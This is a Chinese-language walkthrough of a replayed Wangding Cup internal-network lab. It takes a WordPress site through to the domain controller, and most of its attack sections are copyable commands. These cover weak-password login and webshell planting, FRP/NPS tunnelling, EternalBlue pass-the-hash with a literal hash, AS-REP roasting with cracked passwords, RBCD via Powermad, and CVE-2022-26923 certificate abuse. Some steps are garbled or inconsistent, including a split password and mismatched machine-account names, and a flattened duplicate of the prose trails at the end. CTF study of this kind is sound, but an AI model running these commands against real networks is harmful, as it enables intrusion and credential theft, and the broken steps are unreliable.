模拟实战靶标之网鼎杯半决赛复盘
字数 984 2025-08-20 18:18:23

网鼎杯半决赛内网渗透靶场实战教学文档

靶场概述

本靶场为2022年第三届网鼎杯决赛内网靶场的复盘环境,包含4个flag分布于不同靶机。通过该靶场可以学习内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术,特别是域环境核心认证机制的理解。

前期信息收集

初始访问

  1. 给定IP地址:39.101.173.234
  2. 识别为WordPress 6.4.3框架
  3. 后台地址:/wp-admin/
  4. 使用弱口令登录:admin/123456

获取Webshell

  1. 修改404.php文件:/wp-content/themes/twentytwentyone/404.php
  2. 使用蚁剑连接获取靶标权限
  3. 在根目录获取第一个flag

建立交互式Shell

python3 -c 'import pty; pty.spawn("/bin/bash")'
export SHELL=bash
export TERM=xterm-256color
Ctrl-Z
stty raw -echo;fg
reset

建立隧道

FRP隧道配置:

  • 服务端(Kali): 
    bindPort = 7000
  • 客户端(靶机): 
    serverAddr = "出网机"
serverPort = 7000
[[proxies]]
name = "socks5"
type = "tcp"
remotePort = 6001
[proxies.plugin]
type = "socks5"

内网渗透

内网扫描

上传fscan工具扫描内网,获取以下信息:

172.22.15.26 - 当前靶标地址
172.22.15.24 - 可能存在永恒之蓝漏洞
172.22.15.35 - XIAORANG\XR-0687
172.22.15.13 - 域控 XR-DC01.xiaorang.lab (Windows Server 2016 Standard 14393)
172.22.15.18 - XR-CA.xiaorang.lab (Windows Server 2016 Standard 14393)

NPS隧道搭建

  1. Kali作为nps服务端
  2. 靶标作为npc客户端
  3. 建立socks5代理(端口3333)

永恒之蓝漏洞利用

  1. 发现172.22.15.24存在永恒之蓝漏洞
  2. 使用proxychains配合socks5代理进行攻击
  3. 获取系统hash进行攻击:
proxychains psexec.py administrator@172.22.15.24 -hashes ':0e52d03e9b939997401466a0ec5a9cbc' -codec gbk
  1. 在桌面找到第二个flag

域渗透技术

AS-REP Roasting攻击

  1. 使用GetUserSPNs.py寻找未做Kerberos预身份认证的用户
  2. 获取hash:
proxychains GetNPUsers.py -dc-ip 172.22.15.13 -usersfile user.txt xiaorang.lab/
  1. 使用hashcat爆破:
hashcat -m 18200 --force -a 0 '$krb5asrep$...' rockyou.txt
  1. 获取凭据:
lixiuying@xiaorang.lab/winniethepooh
huachunmei@xiaorang.lab/1qaz2wsx

基于资源的约束性委派(RBCD)攻击

  1. 使用PowerView枚举用户DACL:
Import-Module .\PowerView.ps1
Get-DomainUser -Identity lixiuying -Properties objectsid
Get-DomainObjectAcl -Identity XR-0687 | ?{$_.SecurityIdentifier -match "S-1-5-21..."}
  1. 使用Powermad添加机器用户:
$Password = ConvertTo-SecureString 'Qwer1234' -AsPlainText -Force
New-MachineAccount -MachineAccount "HACK01" -Password $($Password) -Domain "xiaorang.lab" -DomainController "XR-DC01.xiaorang.lab" -verbose
  1. 配置资源委派:
$A = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3745972894-1678056601-2622918667-1147)"
$SDBytes = New-Object byte[] ($A.BinaryLength)
$A.GetBinaryForm($SDBytes, 0)
Get-DomainComputer XR-0687 | Set-DomainObject -Set @{'msDS-AllowedToActOnBehalfOfOtherIdentity'=$SDBytes} -Verbose
  1. 使用SharpAllowedToAct工具:
SharpAllowedToAct.exe -m HACK01 -p P@
$$
w0rd -t XR-0687 -a XR-DC01.xiaorang.lab -d xiaorang.lab
  1. 获取ST票据:
proxychains impacket-getST xiaorang.lab/'hacker1$':'Admin@123' -dc-ip 172.22.15.13 -spn cifs/XR-0687.xiaorang.lab -impersonate Administrator
  1. 导入票据并横向移动:
export KRB5CCNAME=Administrator.ccache
proxychains -q impacket-psexec -k -no-pass -dc-ip 172.22.15.13 administrator@XR-0687.xiaorang.lab -codec gbk

CVE-2022-26923证书服务漏洞利用

  1. 使用Certipy枚举可利用的证书模板:
proxychains certipy find -u 'lixiuying@xiaorang.lab' -p 'winniethepooh' -dc-ip 172.22.15.13 -vulnerable -stdout
  1. 创建机器用户:
proxychains -q certipy account create -user 'spring$' -pass 'Admin@123' -dns XR-DC01.xiaorang.lab -dc-ip 172.22.15.13 -u lixiuying -p 'winniethepooh'
  1. 请求证书:
proxychains -q certipy req -u 'spring$@xiaorang.lab' -p 'Admin@123' -ca 'xiaorang-XR-CA-CA'
  1. 转换证书格式:
openssl pkcs12 -in xr-dc01.pfx -nodes -out test.pem
openssl rsa -in test.pem -out test.key
openssl x509 -in test.pem -out test.crt
  1. 使用PassTheCert工具:
proxychains python3 passthecert.py -action whoami -crt test.crt -key test.key -domain xiaorang.lab -dc-ip 172.22.15.13
proxychains python3 passthecert.py -action write_rbcd -crt test.crt -key test.key -domain xiaorang.lab -dc-ip 172.22.15.13 -delegate-to 'XR-DC01$' -delegate-from 'spring$'
  1. 获取ST票据并接管域控:
proxychains -q impacket-getST xiaorang.lab/'spring$':'Admin@123' -dc-ip 172.22.15.13 -spn cifs/XR-DC01.xiaorang.lab -impersonate Administrator
export KRB5CCNAME=Administrator@cifs_XR-DC01.xiaorang.lab@XIAORANG.LAB.ccache
proxychains -q impacket-psexec -k -no-pass -dc-ip 172.22.15.13 administrator@XR-DC01.xiaorang.lab -codec gbk

总结

本靶场涵盖了从外网渗透到内网横向移动的完整攻击链,重点技术包括:

  1. WordPress漏洞利用
  2. 内网代理隧道建立(FRP/NPS)
  3. 永恒之蓝漏洞利用
  4. AS-REP Roasting攻击
  5. 基于资源的约束性委派(RBCD)攻击
  6. CVE-2022-26923证书服务漏洞利用

通过该靶场练习,可以全面掌握域环境渗透的核心技术要点。

网鼎杯半决赛内网渗透靶场实战教学文档 靶场概述 本靶场为2022年第三届网鼎杯决赛内网靶场的复盘环境,包含4个flag分布于不同靶机。通过该靶场可以学习内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术,特别是域环境核心认证机制的理解。 前期信息收集 初始访问 给定IP地址:39.101.173.234 识别为WordPress 6.4.3框架 后台地址:/wp-admin/ 使用弱口令登录:admin/123456 获取Webshell 修改404.php文件:/wp-content/themes/twentytwentyone/404.php 使用蚁剑连接获取靶标权限 在根目录获取第一个flag 建立交互式Shell 建立隧道 FRP隧道配置: 服务端(Kali): 客户端(靶机): 内网渗透 内网扫描 上传fscan工具扫描内网,获取以下信息: NPS隧道搭建 Kali作为nps服务端 靶标作为npc客户端 建立socks5代理(端口3333) 永恒之蓝漏洞利用 发现172.22.15.24存在永恒之蓝漏洞 使用proxychains配合socks5代理进行攻击 获取系统hash进行攻击: 在桌面找到第二个flag 域渗透技术 AS-REP Roasting攻击 使用GetUserSPNs.py寻找未做Kerberos预身份认证的用户 获取hash: 使用hashcat爆破: 获取凭据: 基于资源的约束性委派(RBCD)攻击 使用PowerView枚举用户DACL: 使用Powermad添加机器用户: 配置资源委派: 使用SharpAllowedToAct工具: 获取ST票据: 导入票据并横向移动: CVE-2022-26923证书服务漏洞利用 使用Certipy枚举可利用的证书模板: 创建机器用户: 请求证书: 转换证书格式: 使用PassTheCert工具: 获取ST票据并接管域控: 总结 本靶场涵盖了从外网渗透到内网横向移动的完整攻击链,重点技术包括: WordPress漏洞利用 内网代理隧道建立(FRP/NPS) 永恒之蓝漏洞利用 AS-REP Roasting攻击 基于资源的约束性委派(RBCD)攻击 CVE-2022-26923证书服务漏洞利用 通过该靶场练习,可以全面掌握域环境渗透的核心技术要点。